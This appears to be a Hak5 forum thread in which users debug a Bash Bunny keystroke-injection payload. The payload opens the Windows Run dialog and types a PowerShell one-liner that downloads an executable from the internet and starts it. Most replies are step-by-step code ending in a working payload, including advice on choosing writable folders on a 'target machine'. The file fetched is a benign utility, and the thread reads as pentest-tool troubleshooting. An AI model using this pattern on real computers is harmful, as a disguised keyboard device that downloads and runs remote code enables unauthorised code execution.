Joeneedshelp1
Posted October 22, 2021

I can't seem to get the script I am working on to work. I just want to have a script that will download a file from the internet. However, the script I am using does not seem to work. Am testing it on Windows 10. Here is the script. What is wrong?

    LED SETUP
    ATTACKMODE HID
    LED STAGE1
    QUACK GUI r
    QUACK DELAY 1000
    QUACK STRING (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"
    QUACK ENTER
    LED FINISH

Rkiver
Posted October 22, 2021

Try the Bash Bunny section. https://forums.hak5.org/forum/92-bash-bunny/

Bob123
Posted October 23, 2021

You have too many """" in your string. You may need to break it up a bit.

dark_pyrro
Posted October 24, 2021

On 10/22/2021 at 2:38 AM, Joeneedshelp1 said:

> I can't seem to get the script I am working on to work. I just want to have a script that will download a file from the internet. However, the script I am using does not seem to work. Am testing it on Windows 10. Here is the script. What is wrong?
>
>     LED SETUP
>     ATTACKMODE HID
>     LED STAGE1
>     QUACK GUI r
>     QUACK DELAY 1000
>     QUACK STRING (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"
>     QUACK ENTER
>     LED FINISH

As said, this is probably not the correct part of the forum for this topic. But anyway, let's break this down. Have you tried to run each "segment" of the script line by line on a Windows PC? This is most often "step 1" when trying to troubleshoot something that doesn't want to execute as intended in the format of a payload. So, how successful are you running the following line in the Run dialog manually? My guess; not that successful at all.

    (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe"); Start-Process -FilePath "C:\Program Files\rufus-3.16.exe"

Why is that? First of all, Windows has no clue of what executable or command you are trying to run with a line starting with "(New-Object Net.Webclient).DownloadFile" since it's referring to .Net functionality, not a specific executable/binary. Let's start with the download part first

    (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Program Files\rufus-3.16.exe")

First thing (depending on how you are going to use it, and in what environment, and with what privileges), I would most likely not put it directly in "Program Files" of the target machine.
Choose something that is more likely to be writable on the local system without any need of touching/changing any permissions on the local system. Using C:\Tmp here just because I'm lazy, but in a real world scenario I would probably use some of the directories that normally have write permissions regardless of local user type.

    (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe',"C:\Tmp\rufus-3.16.exe")

Next thing is to clean the string up a bit, change the " surrounding the path to the download directory to '

    (New-Object Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')

To be even more "correct", we can throw in "System" into it all

    (New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')

Now pull up the run dialog manually on a Windows system to verify it all manually

    powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe')"

The above line should download the executable and put it in C:\Tmp

Also verify that it is possible to start the downloaded executable using PowerShell (this should be no problem), same thing here though, change " to ' that surrounds the path and file name to the executable.

    powershell "Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

So, after changing the line/string to something that Windows understands, the next thing will be to append the file execution above to it all.

    powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

In a "format" ready for the Bunny payload, it should look like this

    QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"

Adding Read-Host to the end of the line to execute can be good if in need of seeing what output the PowerShell window generates; errors and such might be nice to be able to spot before the window closes

    QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'; Read-Host"

Last but not least, language! Use the proper language of the target system (if non US) with DUCKY_LANG, otherwise some chars will be garbage when the payload is executed by the Bunny. Some chars might need to be escaped in the payload file as well, but you have to try that and see what's needed. It should work without escaping anything in this particular payload.

The final result looks like this (remember to change the DUCKY_LANG if used)

    LED SETUP
    DUCKY_LANG xx
    ATTACKMODE HID
    LED STAGE1
    QUACK GUI r
    QUACK DELAY 1000
    QUACK STRING powershell "(New-Object System.Net.Webclient).DownloadFile('https://github.com/pbatard/rufus/releases/download/v3.16/rufus-3.16.exe','C:\Tmp\rufus-3.16.exe'); Start-Process -FilePath 'C:\Tmp\rufus-3.16.exe'"
    QUACK ENTER
    LED FINISH